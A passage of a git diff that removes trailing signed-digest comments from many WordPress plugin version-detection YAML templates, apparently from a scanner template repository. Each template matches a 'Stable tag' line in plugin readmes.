b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009ff080f049a61dc1088f01f8bddb3b5b128416f6fa93e4eae5fdb7e7e3d08b4302207d008f200f13bc64bdcea90b47463b40c09d2bcb54f3978f4f970f1ebb321320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 05707b05ea..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220215ba25ba27a8fe786e915ea597abbb6ca9c3bda25e445bfa967363f392dff75022100adb63c2c0e78200bcce5b060d6476442cc08bd044ca08e7aac7b8a025a4f7cfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index a122dbb0e6..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e11cacd0c80b0f9c5c7bb6c133b6fd023e37f6ab962ba57ff6c792e09fabcef802210094cb89b2197ff5c0320f1ccb0c3c25b8baa475d7a538a78f35ea15e49ca7dbb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index b624ab21ea..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e8368013484aa8de4f7a9acbffc58e5f41e07e77ccfa9b4da60185bc024c85560220538182cb36146e5b448a9b7898e16c57c5d72f89d6f62f246b86b6f5789097e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index aa09a912b1..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022018383f13c220fc85f7a60921f4e4f2b3fcf666c06e79b926e723311a0948996d022062452012d87906adac4df602e02411f7f884e999e3bcd0e153fb83be6c37c05c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 6ea71d04c4..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220071a37893119d0aef75704eb2651c19ba233e6b47c1618342f25f93a8f9e5c98022100a63bbd967db79cc5cc42ca66a830c32dffd5823d96f5447efc4e272c9765421d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index aefd6883cc..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad7b9de4639177a7f4d81b27f1c4be2e02dcc3feeec3d88026dcf9a2597dcada022100db49ee2d3ba518276084d373e0a0eeb26d029e3172430adb00829ca8629c60ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 8fbc2e67ed..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e39aae7e43a5554b0b462c4b2c3ade39686d8691a19084d74bf3589eae7cb1a02205f2a431062e49ca6a69a60af744e9886ccc673b4d8a17469aa33dc99d45f04a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 649aaf1b52..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f21831e9564308bce837c83c797d8dfd30f6572683b1378d8fba96ed5366fde022039b043a5ab7bdca7dcb203d61f144bf54ccc5b0b4a42bc628a2cf97d583e1cff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index fa145f4a35..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5c6f51ee0b59c2118589ca3f351def7abf0d0057396576b9986c8da374f4c50022100bd4a97a6eb0b4744a7fa221285f0cb494c88978158f76058a9a1520a4acb1d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index edbc95a869..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220147aaa4b40315d8674f540f2fe6a8346eaf19e86a054b062ba9eb50db758fa70022100a6f71da94c9da96e5860d5236b74f2e3a562135fae94eedce38264c346722be1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 471452997d..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022073595c8b1756368a8df9237ce4b6efca6391cff8131ee92a1b5d85f2fc227104022100c2eb08a28267774c42de2d63ec7427fb4750bb9ac29edb21218d9ad3ff1c07f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 511621fd83..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d28cf1310a25c9556aa04776e581df35d39a680aa6546c25a71a16d9a2d9d26702206dd7984641f89ceba01cb98dab6ff5e1bb1ddba17385c7e0a2be392883f4c59d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index d35202cca0..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff0a9f808afd5efbf8c6df6f09903baadad192f7e79bee88fe6bf899ad30c894022061d86088db8fdcb05e222424b68779e4e35261d78dd85f326586c3003c0ea80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index d69cbce8e2..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210084744039f57576b62e00cd3ff262bd0f6d5e1dd19f82ab54f091308a3f75b53902210094b13e6b3c0f9aaca8f69d46e08878168b6a71126387055bab87c8185829ea06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 7fe853ea9b..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ceff873de4caed7029b6ca13609b1711a75f333cd935cc7b1a19beaed1ac15ef02210086679e3ad390857892a459385e22d3f908bd5f3344a074b1caec33d11ab3ed8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index eea02824e4..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a28db66a0ab2a6eeafed6e0c5a8c92aecfb5a34296f85b26cc60b05ce68829040221008e9f8600492e77cd8320d5f88420a8858b49974d32e8cd7bb6ad61db70f9fb05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index a25b851a47..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201dd0b669bf3de02c22037d9d60d9bf84bbf532a4b3d960360a99de7dda934d5502203c1683a67ca25c4bfe86647c93d7998f2b1054fdd758cf77dd5c5213df25d0db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 74c3bd4152..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079caa917179bb5a86d3918b438c0b3feeca0c3f5a3900e5e8da1c060ee278f0f02207c62510b7c323103afb35008e43bc56f4d4ebd87e1c304eec0785dd9c7c86c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 206aec38a9..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200dd1342a1d40f3bcdec8a288573df80e60f53c6120bb6ca746039a26253d54ae02206e7636d5c5692e3f9de410990d000c4df9c2393da5312985e32c87e8480faf7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 369422b94a..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220262a1485b7d7711c871419d6bc05e80f0d0898fb22a3b4920c6459e1b514ae5002202b92abdd79a3fe02edd79e7a538719cba5814feb7698daffd879dae410915494:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1ff9aafaa0..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e85b365fbd3be0c5ce49f5d892f1cdaac406aca0785547ff80ffd075a02875a6022032d75202febfdeec9f9c0cf400574ac07150e1d160cfb2e1936fc29b841ae2c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 8a623384f5..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022049484274f7038d33e7ddac05e0e873a32c1fed4ce51bf8a9f93f7860cc6cf69e02205e7d90c4711961dc6c6c5a4ac05e0dcbe491e562f218d698778dc1f33f398eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 727134539a..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c296a3c2f8f2f3678ae65ce81e1d17ae07a0b1e38a157e7cb309d8dd05ee6820022100ef4c765d82f4cd8926c50b5179037df06b2d9fc27b8257a39085a96e1904b279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 668827909a..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2f80a2985aae02a03fa37bcf7881952f45dc9a8f04236a3e28705e84981bc1e02201cd72b75c1367a2e0a892955a85e2cd62748240e6d7313d8346cc95875f8f5d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 765df2e602..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203495d2521a966e616f194b5730b732b1cf5fbcf0a60ea0cd653b79a82898acf402205111a56192cc2bdf060cb0d95033a77da69d7695d94d60e8d689d4fdeeb1ce29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 0db9e7c1c0..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d6e2d2782cb2f5ded9302a825365893a34fa1037e0b79266855401418e7505d022100f3227319276454b635d099b50ce6de0785d5a427ddd96b01af7daa3ec9a85dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 18344fd118..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ece4a5053faf7ba6b3cf99d35d5a56169a168338e052b427ca38c335e5dec12f022100e45894615077ce4ba81434cc05c9a432e4ea185571bd9829691b99224702ec73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 50b6e43734..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210082bfb7dd7836191908f230b9c10f9d870a34f6fa8e900438cd56dc6ac43ba334022100955361f24cc19ed73826525eb815bdb846a55116aa9b0261a9150d1f3d3852ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index eb02e0dff9..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a5104b7f187af43dadf341d3db79ae060255b8e8bfa03ac7cc338349b32b48f022100b750700b5c975c83dc2e0e032d624726757b50b1d8a4be33f66e7b99c46fa00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index d8f9c9d163..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eecb59c000ff020a0ef53e69b612314c281d1bfe85f325ec67a3e756072b802e022007bbf5c7cc14d3327463fe0b2ebe3f7c8796c37f95bdd1c8aa99e1d5c1bc4e31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 1222130927..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f7f89135e60eac1270645f5288dbb772c13bb9b3501d4b5b2749190a0e7f7e5202206c2956e5bbcea69bdeeb6fc1c41130fdd9d1e4d533dbf66d57016c5dbaf40a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index a13c498c04..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bbcb4f43d189b6dbbb036289568c355f9498fa0e03852068137761242aaef9cb022100ffbfc18edcb3fb98c50255f03808cf20e19996ad1946b300790507e520688bbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index f1beed7336..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bfc96521387a0e588d4a70f6a6d8a1ec373d0bd1a9e29033c8838ea3d2f8ce9e022100f599cc9f6606062ed9299c22480b789f9845dc9e3c39a3bdf05e5ff7f8f1e80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 189e85719b..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220603220421ad38fd9c3004512c4d726dc30bbd22c2c93cc452c030fdd0edc13b102205e4dee9366722c18ba241380fdff55a7b1a012a3863061210f0eb593efe8421e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index a690f0302d..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205a96e3564f670a4e4fcd55835dbd97a000edfc071b0f247d7f5e61bb533337d10221008638fac951456839c78aae803dc42c6ac63b80c3edb636fe9135061da15b5a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index f00d91f95d..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd72c10c9641f372ebdfdf42a3895f952b0828fc8fc22c71564947b0ea8de60d0220160174e601c38dd56123193875cace33e410fa7b2161f2fd4ea37d00daa7967b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index e6b7460a92..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a0ffaf26f11276014ae5aa310f28a37142cec3a2c5d718696ff25e47c0782a7f02203797a879192beac15295c3541a01d5f1669c770b792fc1355cb49df5eb753308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 7548e37570..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a80b0fff458d513b77d15f2757ce453d9f5300c856fef5e8c25ca785728ea731022100c73ae174e031b786dc7fbb77d50db6c547d828a8f8c84b6c867d760e13876c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 5ef05a9750..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022006a3a2aa538d05523fb14a7d91c8e904ef63d50276165770fc740f4727b26ea0022100c5a123ab5d243e8136d499024019857cbfed767b1c7e911e228c640729af3ed1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 95fd0a3006..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062211a5b843dddbfbb2ec0075a9ec80b514ea53d8d2d80098bab8eb3487e2764022058bc120d68ab99ae7cdb7000c466d979020ad5c5e903609debc43aa43c343f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 71d6f618f8..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b373644e286d087ad2de9fab6e023fd53512f6a157fe765405e177d951cda5ab022036a598676d1ffb1b1dff750dc063adca6f1e75132eda987f2cc5fe34c99d9461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9eae2e7ee2..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e539b0f3073b83c7215602f553387ffe19baa2dbb83de413c22fdf3383e2b060221008c56492b13ee9b790a89a5d331f1c245682b09cf9f6cf568f791a2b0ecfc9905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 05419dcc82..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f194a0088ece5e90f2db9886ec99a81405ab78f13c5fede36c242afb7970136022100a75da671ebe6a6ea6d6c7b5a6aa63e1886ec44227e239ae18e6743902d46a299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 6bf38e9d25..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4db0ba01ad638b3b94594698d727d7cbb5ce8598958dc3f2ce9ef3dba3523a8022100dfe922b010162ed28b7510c7d9ee19e110fa6922e7dadfb9df977316e520a2f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 5c44d9c9a2..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c6cdaa6115e3b6a921dd5539423236574c870c23f2a90fe579aef1a7e2c79280220616e76d843ec42132c4766526f9a2fdcc67ca33feae10fcb249a13d820ae884f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 2f552eb16d..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079a2b08b88c3396bb62376494e41cc23088ae2ab3f3f5bc2b6b45bb59580bf96022001e95c37325bfb12872bc8031a44b12b0955e6df5a09c3c1d58255de4b72948f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 34a8cc7404..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ 